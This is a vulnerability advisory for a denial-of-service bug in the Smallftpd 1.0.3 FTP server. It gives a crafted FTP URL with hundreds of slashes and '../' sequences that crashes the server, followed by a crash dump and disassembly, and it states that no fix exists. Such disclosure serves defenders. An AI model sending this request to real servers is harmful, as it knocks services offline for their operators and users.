Smallftpd 1.0.3 DoS
Application: Smallftpd
http://smallftpd.free.fr/
Version: 1.0.3
Bug: Denial Of Service
Author: intuit
e-mail: intuit@xxxxxxxxxxxxx
web: http://rootshells.tk/
greetz to: tgs ;)))
***********************************************************************
1. Description
2. The bug
3. The code
4. The fix
***********************************************************************
^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^
Vendor's Description:
"Small ftpd is a small and simple muli-threaded ftp server for windows."
***********************************************************************
^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^
Plural inquiries string like (usually 2(two) times suffice):
-----------------------------------------------------------------------
ftp://user:pass@xxxxxxxxx/[464 and more "/" symbols]/../../../
-----------------------------------------------------------------------
crash a smallftpd.exe.
User:pass must be valid.
***********************************************************************
^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^
The mistake occurs here:
-----------------------------------------------------------------------
AppName: smallftpd.exe AppVer: 0.0.0.0 ModName: user32.dll
ModVer: 5.1.2600.0 Offset: 0000ca84
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Registers:
EAX=56534150 EBX=0000000A ECX=56534150 EDX=00000000
ESI=56534151 EDI=0136F8FA EIP=77D4CA84 ESP=0136F85C
EBP=0136F894 EFL=00000206
CS=001B DS=0023 ES=0023 SS=0023
FS = 0038 GS = 0000 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=1 CY=0
56534150 = ??
Code(Win XP Build 2600, Service Pack: None):
77D4C9F6 mov ecx,dword ptr [esp+8]
77D4C9FA mov eax,dword ptr [esp+4]
77D4C9FE cmp ecx,eax
77D4CA00 jbe 77D4CA12
77D4CA02 push ebx
77D4CA03 mov bl,byte ptr [ecx]
77D4CA05 mov dl,byte ptr [eax]
77D4CA07 mov byte ptr [eax],bl
77D4CA09 inc eax
77D4CA0A mov byte ptr [ecx],dl
77D4CA0C dec ecx
77D4CA0D cmp ecx,eax
77D4CA0F ja 77D4CA03
77D4CA11 pop ebx
77D4CA12 ret 8
77D4CA15 sub ecx,69h
77D4CA18 je 77D4C85C
77D4CA1E sub ecx,7
77D4CA21 je 77D77FAF
77D4CA27 sub ecx,3
77D4CA2A je 77D4CAF5
77D4CA30 dec ecx
77D4CA31 dec ecx
77D4CA32 je 77D4C863
77D4CA38 sub ecx,3
77D4CA3B jne 77D4C97D
77D4CA41 cmp byte ptr [ebp+0Bh],0
77D4CA45 push 10h
77D4CA47 pop ebx
77D4CA48 je 77D4C867
77D4CA4E cmp dword ptr [ebp-20h],0
77D4CA52 sete al
77D4CA55 dec al
77D4CA57 and al,0E0h
77D4CA59 add al,78h
77D4CA5B mov byte ptr [ebp+0Bh],al
77D4CA5E jmp 77D4C867
77D4CA63 cmp dword ptr [ebp-14h],eax
77D4CA66 jne 77D7ED06
77D4CA6C mov ecx,dword ptr [ebp-0Ch]
77D4CA6F mov ecx,dword ptr [ecx-4]
77D4CA72 mov dword ptr [ebp-2Ch],ecx
77D4CA75 mov dword ptr [ebp-28h],eax
77D4CA78 jmp 77D4C89D
77D4CA7D add ecx,esi
77D4CA7F jmp 77D4C9D5
77D4CA84 mov dl,byte ptr [eax] <<< ftp server crashing here
77D4CA86 inc eax
77D4CA87 test dl,dl
77D4CA89 jne 77D4CA84
77D4CA8B sub eax,esi
77D4CA8D xor esi,esi
77D4CA8F xor edx,edx
77D4CA91 cmp dword ptr [ebp-10h],edx
77D4CA94 jge 77D7A796
77D4CA9A sub dword ptr [ebp-8],eax
77D4CA9D cmp esi,edx
77D4CA9F jne 77D6FF80
-----------------------------------------------------------------------
/*Tested on: Win XP Build 2600, Service Pack: None
Win XP Build 2600, Service Pack: SP1
Win 98 Second Edition */
***********************************************************************
^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^
Not exist.
***********************************************************************
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze